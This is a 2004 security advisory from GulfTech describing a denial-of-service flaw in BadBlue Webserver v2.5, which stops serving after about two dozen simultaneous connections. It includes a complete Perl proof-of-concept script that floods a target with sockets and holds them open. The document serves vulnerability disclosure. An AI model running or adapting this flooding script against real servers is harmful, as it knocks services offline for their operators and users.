########################################################## # GulfTech Security Research August, 18th 2004 ########################################################## # Vendor : BadBlue # URL : http://www.badblue.com # Version : BadBlue Webserver v2.5 # Risk : Denial of Service ########################################################## Description: Share photos, videos, music, and business files with friends and colleagues instantly. Tired of paying a service to share your files (and the hassle of sending your files to their site) BadBlue shares files directly from your own PC, using the cable /DSL/broadband/dialup connection you already paid for! BadBlue lets you run a no-hassle Web site on your own PC for free, including a domain name you can choose. Within seconds, you can transform your PC into a friendly, file sharing Web server with all the power of a real server on the Internet. Remote users can search for files, explore your shared folders, and run full-blown applications created in HTML, PHP, Perl, and so on. Denial of Service: BadBlue Webserver cannot handle multiple connections from the same host, and will deny all acess to any users at right around twenty four simultaneous connections.I have included a proof of concept that floods the target server with a number of connections, and then basically keeps those connections up for as long as you specify, thus blocking all other traffic to the affected server. #!/usr/bin/perl ############################################################## # BadBlue v2.52 Web Server - Multiple Connections DoS POC Code ############################################################## # BadBlue Web Server can not handle many simultaneous connects # from the same host, and will lock up until the connects stop ############################################################## # This Proof Of Concept Written By GulfTech Security Research ############################################################## use Strict; use Socket; use IO::Socket; my $host = $ARGV[0]; my $port = $ARGV[1]; my $stop = $ARGV[2]; my $size = 1000; my $prot = getprotobyname('tcp'); my $slep = $ARGV[3]; printf("================================================\n"); printf(" BadBlue v2.52 Web Server Denial Of Service POC \n"); printf("================================================\n"); printf("[*] Making %d Connections To %s \n", $stop , $host); for ($i=1; $i<$stop; $i++) { socket($i, PF_INET, SOCK_STREAM, $prot ); my $dest = sockaddr_in ($port, inet_aton($host)); connect($i, $dest); } CheckServer($host, $i, $slep, $stop); KillThreads($stop); printf("[*] Exploit Attempt Unsuccesful"); exit; sub CheckServer($host, $i, $slep, $stop) { ($host, $i, $slep, $stop) = @_; $blank = "\015\012" x 2; $request = "GET / HTTP/1.0".$blank; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port, Timeout => '10000', Type => SOCK_STREAM, ); print $remote $request; unless ( <$remote> ) { printf("[*] Host %s Has Been Successfully DoS'ed\n", $host); printf("[*] The Host Will Be Down For %d Seconds\n", $slep); sleep($slep); KillThreads($stop); exit; } } sub KillThreads($stop) { $stop = @_; printf("[*] Killing All active Connections"); for ($l=1; $l<$stop; $l++) { shutdown($l,2)|| die("Couldn't Shut Down Socket"); $l++; } } Solution: The development team has been contacted and said they will be looking into this issue shortly. Users are advised to upgrade as soon as possible. Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00042-08202004 Credits: James Bercegay of the GulfTech Security Research Team